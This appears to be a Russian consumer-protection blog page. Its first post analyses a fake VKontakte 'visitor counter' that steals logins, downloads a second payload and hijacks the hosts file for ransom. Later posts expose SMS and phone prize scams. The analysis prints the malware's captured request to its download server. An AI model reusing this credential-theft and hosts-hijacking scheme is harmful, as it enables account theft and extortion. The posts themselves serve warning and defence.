Раскрываем карты →  «Гости на моей страничке» Очередной вредоносный спам вконтакте

Благодарим за статью хабрапользователя Onthar!
Орфография авторская.

Здравствуйте. Не так давно я писал про рассылку зловредов по социальной сети «Вконтакте». Не так давно встретился новый, в общем-то похожий случай…
Кинули мне на анализ некий файлик VKGuests.exe, который должен показать кто посещает страничку вконтакте. Скачан файл был с сайта vko-blog.ru, ссылка на который пришла от друга. Жалоба была на то, что «пропал интернет». Любопытно. Ковыряем.

Прежде чем соваться к файлу, было бы интересно почитать, что пишут на том сайте.
Видим классическую замануху об «уникальности нашей программы» от якобы Павла Дурова.
Все ясно) В самом низу синяя кнопка «Установить счетчик», при нажатии на которую, собственно, и предлагается скачать VKGuests.exe.
Файл представляет из себя PE-бинарник, весом в 2 230 040 байт, защищен DotFix NicеProtect.
На момент проверки детектировался на virustotal 12/42

Пробуем запустить, нас встречает симпатичного вида окно, рекомендующее закрыть все браузеры для стопроцентной работы этого «счетчика». Закрываем браузер, нажимаем OK. Открывается не менее красивое окно с полями для ввода логина/пароля учетки вконтакте.


Берем в руки сниффер, вводим данные от балды. При вводе логина не в виде электронного ящика — ссылается на ошибку. Попробуем изобразить почту, к примеру 1111@mail.ru, пароль должен быть не короче 6 символов.

Сниффер поймал коннект с адресом 91.193.194.113, который никак не относится к уютному контактику.
Содержимое сесcии:
GET /stat/config.txt HTTP/1.1
Host: sjhgjjd.ru
Accept: text/html, */*
Accept-Encoding: gzip,deflate, identity
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 16:22:10 GMT
Server: Apache/2
Last-Modified: Sun, 01 May 2011 10:42:57 GMT
ETag: «5c01b-b4-4a23491ebee40»
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 158
Content-Type: text/plain

«timeout»:«0»
«photo_url»:«hxxp://cs10358.vkontakte.ru/u7041153/133719745/x_07e5f13b.jpg»
«file_url»:«hxxp://sjhgjjd.ru/install_msi.exe»
«ac_key»:«15f8a3de833b23fd150188ddd3d1f9d7»


Аха, выдаются для скачивания любопытные вещи: ссылка на странный файл с непонятного адреса, ссылка на картинку с кратким содержанием того блога, о котором говорилось вначале и ключ от сервиса антикапчи, используемый для спама/флуда систем, защищенных капчей. Ну, я подобным я как-то сталкивался. Закрываем VKGuests.exe к чертям и скачиваем файл по ссылке самостоятельно.

Перед нами сжатый с помощью UPX файл install_msi.exe, весом в 179 200 байт. Снимаем UPX, и предстает перед нами исполняемый, скомпилированный в PureBasic, весом 198 656 байт.

запакованный
распакованный

Едем далее — глядим ресурсы подопытного, где обнаруживаем, конечно же, обфусцированный батник, меняющий хостс-файл.

При обращении к заблокированным сайтам нам предложат заплатить через терминал Qiwi денег на счета вебмани:

В общем-то для лечения стоит только удалить оба файла hosts из c:\windows\system32\drivers\etc\ (один из них будет скрыт, в другом одна буква — не латинская.

Но что будет, если бы мы ввели реальные данные в самом начале эксперимента?
Вводим правильные данные, программа начинает активно скачивать из сети «недостающие компоненты», которые были описаны выше.



Затем долго «думает», рассылая спам, и перезагружает компьютер.
Я уже говорил, что этот вредоносный пакет получает ключ для антикапчи, так вот он используется для массового отмечания всех друзей на фото, добавленного в профиль той учетки, данные которой были введены. Не исключено, что логин и пароль, переданные на сервер точно так же, автоматически, будут использоваться для дальнейшего спама.

Вирус не резидентный, поэтому после перезагрузки он не только не продолжает работу, но еще и удаляется из системы, прихватывая за собой все барахло, которое было скачано. Ну, кроме подмененного hosts =)

Собственно все. Более ничего интересного из этого зловреда выжать не удалось, да и не хотелось.

Ссылка на оригинал: http://habrahabr.ru/blogs/virus/118815/

Еще раз от нас спасибо. Люди, будьте бдительны.

СМС-мошенничество →  Будьте бдительны.



Хай, честные люди!

Если вы увидели на каком-либо сайте наш логотип или значок и этого сайта нет в списке Проверенные сайты — знайте — это развод.

Сайт, на котором разводят людей — visibal.ru



Они продают, якобы, сайты, баннеры, взламывают страницы ВКонтакте, барыжат номерами ICQ, создают флеш-игры. Ничего у них не покупайте, они разместили наш баннер без всяких проверок. Просим заметить и тот факт, что мы не сотрудничаем с сайтами такой тематики.

Мы не являемся друзьями мошеннических сайтов, а мошенники, занимающиеся таким недобросовестным делом, должны икать до конца жизни.

СМС-мошенничество →  Ну совсем тупой разводняк

Если вы любитель тестов, не торопитесь рассылать смски. Учтите, стоимость одной 300 руб. Скорее всего придется послать две, при чем так коряво и написано, мол может быть, из за того-то…



( Читать дальше )

СМС-мошенничество →  Очередной развод от SMSZilla. "СМСМаньяк" http://smsmanyak.ru/

Это очередной лохотрон от авторов подобной разводилки swall.
На сайте написано:
«Бесплатные СМС сообщения абонентам практически всех Российских (пока что) операторов можно отправить через нашу программу SMSManyak.ru!»
Пробуем скачать. Устанавливаем, и при первой же попытке отправить смс, просит якобы подтвердить номер отправителя.

Нигде нет информации о том что с Вас снимут денег, и в каком количестве.
Мелким шрифтом внизу ссылочка — информация для абонентов, а если прочитать весь текст написанный мелким шрифтом, оказывается, что нужно отправить 2 СМС. Жмём на ссылку, смотрим для нашего короткого номера сумма составляет в среднем 200 руб. В итоге развод на 400 руб и никакого ответа не пришло.

СМС-мошенничество →  www.gazoilsystem.ru просят отправить смс для получения пароля за 305 рублей.

Вчера пришло на почтовый ящик письмо от работодателя ООО «Газ Оил Систем» www.gazoilsystem.ru. Сам я уже работу не ищу, а резюме удалить руки не доходят.
Письмо такого содержания:

От job@gazoilsystem.ru

Добрый день, вас беспокоит компания “GazOilSystem”, в настоящее время, мы ведем работы по открытию наших филиалов в ТОР 40 самых крупных городов России. В связи с чем, требуются рабочие всех специальностей — бухгалтера, переводчики, разнорабочие, повара, официанты, медики, водители и др. Предоставляется проезд к месту работы, проживание, питание, медицинская страховка. Заработная плата, в нашей компании, не опускается ниже отметки 30 000 рублей. Хотелось бы прочитать ваше более подробное резюме. Для записи на собеседование и отправки резюме зайдите на корпоративный сайт компании, в раздел вакансии.
Адрес сайта gazoilsystem.ru/job.html
_________________________________________________________________________________________________________
«Gas Oil System» — один из ведущих Американских разработчиков и изготовителей технологического оборудования для нефтегазовой отрасли промышленности.
Отдел по найму персонала Joe Haley

Вроде все хорошо, но когда начал смотреть их сайт то заметил что очень мало конкретики, зато очень много воды. Ни контактов, ни адреса ничего. В общем закрыл и забыл.
А вот письмо которое пришло на следующий день с того же ящика job@gazoilsystem.ru


Добрый день, вы заполняли анкету и отправляли резюме на сайте ООО «Газ Оил Систем» на сайте gazoilsystem.ru. Мы рады вам сообщить, что вы стали одним из наиболее подходящих кандидатов и приглашаем вас на собеседование (всего приглашается на собеседование 5 человек). С вашей квалификацией, начальный уровень Зп — 38500 руб, если вас устраивает, то Вам нужно зайти на сайт, в раздел «Запись на собеседование» что бы выбрать подходящее для вас время и день недели (до 25 мая 2010). Для входа в личный кабинет вам присвоено имя для входа и пароль:
Имя: 441233
Пароль: В целях безопасности не сообщается по электронной почте, пароль будет выслан вам по запросу на сотовый телефон, указанный в резюме. Для получения пароля отправьте свое имя для входа (у вас это: 441233) на номер 4460, в течении 2 минут получите пароль.
Страница Личного кабинета: gazoilsystem.ru/content.html

Вот все вроде красиво написано, и вроде бы мошенники все учли, но вот словосочетание «отправтье смс на номер», вызывает однозначную негативную реакцию, ведь по идее пароль должны выслать при указании номера своего, а не отправлением смс.
И вот решил что нельзя так оставлять, и хватит уже мошенникам наживаться за чужой счет. К сожалению у меня нет таких знакомых в Органах которые бы могли оперативно прикрыть лавочку, но придать огласке думаю один из самых лучших вариантов.

Спасибо за Ваш сайт, буду рекомендовать всем друзьями и знакомым.

СМС-мошенничество →  Развод от мобильных мошенников

Предыстория:
Моему другу пришло голосовое сообщение от номера 9121577124 о том, что он выиграл приз от Русского Радио. Номер я специально публикую, потому что я уверен на 100%, что это — развод. В виду того, что у него не было возможности позвонить на этот номер — он поручил провести сие действие мне. Поскольку номер друга мне не принадлежит (логично, да?) и есть подозрение, что указанный телефонный номер в сообщении, якобы Русского Радио, платный — было решено осуществить звонок через Skype.

MXSkypeRecorder мне в этом помог. Сразу приношу извинения за качество звука, за формат его подачи (как сделать маленький плеер — не разобрался). Часть разговора потерялась из-за триальной версии программы, эту часть я опишу отдельно. Так же эта замечательная программка во второй части нашего диалога изменила мне тембр голоса. Ну я не обижаюсь. Может быть с дикцией у меня тоже проблема — здесь ничего не могу поделать. Дальше 2 файла с записями и текст.

Часть 1:
Что насторожило с первой минуты звонка — обильное употребление «то есть», чем меня и заразил, слова «чо» и тем, что оператор не представился. Оператор сходу выдал мне 500 слов о том, что компания проводит розыгрыш от «Русского Радио» и мой номер попал в список счастливчиков, перечислил всех известных спонсоров (DHL, Samsung). Типичная схема. Все, чтобы жертва максимально быстро стала доверять мошенникам.
Разговор прервался (да и к лучшему, звукозапись была выключена). Перезваниваю, нет ответа. Я настырный. Перезваниваю еще раз, звучит приятная музыка, на фоне слышны мои клики (в это время сёрфил чего-то).

Тут я допустил первую ошибку, что должно было насторожить оператора. Я, представившись Андреем, сказал, что пришло СМС, но пришло на самом деле голосовое сообщение. Но, видимо, денег хочется, и на кое-что можно и закрыть глаза. Номер телефона и все свои адреса я запикал звуками джекпота из игровых автоматов. 30 секунд мучительного ожидания проверки по базе моего телефона и вот оно счастье: мне рассказали, что я выиграл компьютер на базе процессора Intel Pentium марки Samsung (дзинь!).

DHL — курьерская доставка, Евротелеком — спонсор, Samsung — компьютер. Включаем дурака. Хотим забрать приз.

(3,22 Мb), зеркало 1


Мне предложили 2 варианта. Можно забрать приз, приехав в офис по указанному адресу или забрать денежный, цитата: эквАвалент. Что было бы, если приехать в офис — непонятно. Я решил забрать деньги. 112 000 все-таки немалые деньги, да и компьютер у меня есть. Мне рассказали, что я могу дать свои реквизиты, которые они направят в банк и цитата: «ихние» сотрудники скажут мне что делать.

Вот здесь и прерывается первая часть. Что было между 1 и 2 — рассказываю ниже:

Часть 1,5. Потерянный звук:
Оператор, представляющий компанию Русское Радио вдруг начал представлять компанию Евротелеком. Второй промах оператора. Он рассказал, что терминалы моментальной оплаты у них расположенны по всей РФ. И единственное условие для получения моих кровных 112 тысяч рублей — небольшой денежный перевод. То есть — основной момент получения прибыли мошенниками.

Часть 2. Денежный перевод:
Мне предложили пополнить баланс своего телефонного счёта через их терминал. Сумма, которую мне нужно было перевести — 3000 рублей. Не знаю каким образом они получат свои денежки, но мне кажется, что это — комиссия за использование терминала моментальной оплаты.

Оператор слёзно просил сохранить чек и ни в коем случае не выкидывать. Его, мол, я и буду предъявлять, чтобы забрать свои выигранные деньги. Чек является юридическим документом, бла-бла-бла. У оператора появляется южный акцент. Чек предъявляем кассиру, который будет нас обслуживать, сообщаем свою информацию, паспортные данные, получаем денежный эквивалент.

Уточняем информацию, чтобы ничего не потерялось, уточняем как я все же стал счастливчиком. Включаем дурака еще раз. Из 200 номеров — я единственный, компьютер молодец, поделил номера на 10 призовых и я выиграл.

(3,19Mb), зеркало 2


3 ошибка оператора: нужно срочно перевести деньги, прямо в течение часа. Если я не успею — он не предоставит информацию генеральным спонсорам (хотя генеральным спонсором представлялась сама компания Евротелеком). Они работают до 17 часов. Зовут оператора Михаил Киселёв.

Мы распрощались с оператором, он обещал перезвонить. Извините, но я не выдержал после слова: «Паздравлйяйэм».

4 ошибка оператора. Несовпадение данных. В течение часа с этого же номера на номер друга поступает звонок:

О: Здравствуйте еще раз. Вот мы с вами разговаривали, вы согласны с нашими условиями?
Д: Здравствуйте. Уточните еще раз? (поскольку разговаривал по телефону я, а друг лишь дал номер — ему ничего неизвестно об этом, а сообщить я еще не успел. Но он не растерялся и беседа продолжилась).
О: Конечно. Много текста. Нужно приехать и пополнить баланс. Все дела.
Д: Скажите пожалуйста адрес вашего офиса?
О: ул. Академика Королева 11.
по карте — частный дом, адрес не совпадает с названным в первой части расследования.
Д: Как вас зовут?
О: Михаил Киселёв.
Д: Скажите адрес вашего сайта.
О: Я не могу дать вам такой информации.
Д: В случае возникновения каких-либо спорных моментов, можем звонить в отдел «К»?
О: Аааа, оооо, ээээ. Пик-пик-пик-пик.

Мораль сей басни. Не звоните на номера со своих мобильных — элементарно могут быть платными. И всегда уточняйте информацию у достоверных источников (Русское Радио или любых других).

Запомните, с 9121577124 звонят мошенники. Спасибо за внимание.

UPD : Номер телефона, с которого второй раз перезванивали — 9129412497. Не звоните туда тоже. Принадлежат к Республике Коми. Линк

Уважаемые Абоненты. На Ваши мобильные номера могут приходить СМС сообщения от мошенников с номеров +79041******

(оператор Парма-Мобайл республика Коми), или с номеров МТС московского региона о том, что вы, якобы, выиграли различные ценные призы, и с просьбой перезвонить по определившемуся номеру для уточнения подробностей. Мошенники, как вариант, могут представляться филиалом ЗАО «Евротелеком» в различных городах. После междугороднего звонка вас под разными предлогами будут просить заплатить тем или иным способом деньги. Призываем вас быть бдительными и не покупаться на уловки мошенников.

С уважением, Администрация ЗАО «Евротелеком»


Оригинал статьи: habrahabr.ru/blogs/telecom/90733/

Проверенные сайты →  Вот так и доверяй людям. chudo-dieta.com и chudo-skazki.com Не оправдали ожиданий.

Письмо от внимательного абонента:

Добрый день.
Вы пишите, что
chudo-dieta.com — составление индивидуальных диет по вашим характеристикам.
всё без развода.

Они указывают стоимость услуги в 150 рублей и предлагают отправить sms на номер 2476

Смотрим на сайт
www.mts.ru/services/short_numbers/2476
Информация о коротком номере
Короткий номер: 2476
Название контент-провайдера: ИнкорМедиа, ООО
Стоимость услуги в руб., с учётом НДС: 203,2руб.с НДС
Телефон службы техподдержки, часы работы:
www.incoremedia.ru
E-mail: helpdesk@incoremedia.ru
Tелефон: (495) 982 38 86, круглосуточно

Итого 63 рубля где-то теряются.


Больше не будем их добавлять к себе в проверенные сайты. Не бу-дем.

Новости проекта →  Сервисы приёма пожертвований за СМС вне закона.

Наш постоянный партнёр smsrent.ru намедни опубликовал новость следующего содержания:
Уважаемые партнеры!

Спешим поздравить с наступлением весны и напомнить, что наша компания работает на территории РФ и полностью подчиняется законам этой страны. В частности, уведомляем, что законодательно в России запрещена организация благотворительных акций посредствам SMS-платежей. Любая благотворительная деятельность на премиум-номерах противоречит сразу трем законам — «О банках и банковской деятельности», «О противодействии отмыванию доходов», и закону «О деятельности по приему платежей физических лиц». Данная ситуация вызвана тем, что биллинговая платформа ОСС не позволяет предоставлять контент-провайдерам номера в пользование без вычета собственной комиссии, что в свою очередь, не позволяет благотворительному фонду получать всю перечисляемую абонентом сумму.

До внесения поправок в вышеупомянутые законы компетентным органами, правилами СМСРЕНТ строго запрещено использование номеров в благотворительных целях. В случае выявления Службой безопасности фактов нарушения данного правила партнером, к нарушителю будут применены санкции, вплоть до блокировки аккаунта с системе.


Так что знайте. Отправляя СМС в целях благотворительности — вы содействуете нарушителям закона (сразу трём законам).

Пример от «Вестей»:

СМС-мошенничество →  Как вернуть деньги с отправленного на короткий номер 7122 сообщения?

Сейчас я вам расскажу, что делать, если вы попались на мошенничество с использованием этого короткого номера. Так уж повелось, что номер 7122 (наряду с 3649) — одни из самых давних номеров, который используется недобросоветсными партнёрами компании paystream.ru.

Прежде чем писать гневные жалобы во все биллинги, которые используют короткий номер 7122 — напрямую обратимся к владельцу короткого номера. Напомню, что ваши оскорбления и необоснованные претензии у смс-биллингов никакого желание рассматривать нет (если они невиновны — вы ничего не добьетесь, а более того, потеряете свои деньги, кучу нервных клеток и помощь в поиске мошенников и ответственных за развод лиц).

У агрегатора paystream.ru есть служба поддержки, расположенная по адресу payhelp.ru. Туда и проследуем.


( Читать дальше )